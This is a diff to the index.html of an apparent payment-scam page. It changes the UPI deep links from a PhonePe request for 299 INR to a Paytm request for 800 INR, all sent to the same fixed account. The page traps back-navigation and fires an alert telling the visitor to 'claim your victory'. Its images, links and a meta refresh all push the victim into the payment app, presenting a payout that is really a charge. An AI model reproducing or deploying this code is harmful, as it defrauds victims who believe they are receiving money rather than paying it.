--- a/index.html
+++ b/index.html
@@ -37,7 +37,7 @@
  onpopstate=function (t)
  {
   t.state && alert(' Claim your Victory by Clicking on \n "SEND IN BANK ACCOUNT"  ')
-location.href='phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu=INR&mode=02&purpose=00&tr '
+location.href='paytm://pay=shuugeez@freecharge&txn_amount=800&currency=INR '
   ;
   }}
   catch (o){}}();</script>
@@ -61,7 +61,7 @@ location.href='phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu
 
 <div>
 <div>
-<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu=INR&mode=02&purpose=00&tr '">
+<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='paytm://pay=shuugeez@freecharge&txn_amount=800&currency=INR '">
 </div>
 <div class="container" id="js-container">
 <div class="confetti"></div>
@@ -103,7 +103,7 @@ location.href='phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu
 	
 		<div>
 			
-			 <a href="phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu=INR&mode=02&purpose=00&tr">
+			 <a href="paytm://pay=shuugeez@freecharge&txn_amount=800&currency=INR">
 				 
 				 <img src="3 (2).jpg" width="100%" height="auto">
 				 
@@ -111,14 +111,14 @@ location.href='phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu
 			
 		<!--	
 			
-             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu=INR&mode=02&purpose=00&tr">
+             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="paytm://pay=shuugeez@freecharge&txn_amount=800&currency=INR">
         </div>
 
 	
 	
 	
 	
-	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=shuugeez@freecharge&pn=YDV56693218&tn=&am=299&cu=INR&mode=02&purpose=00&tr">
+	<meta http-equiv="refresh" content="6;url="paytm://pay=shuugeez@freecharge&txn_amount=800&currency=INR">
 	
 	--->
 	
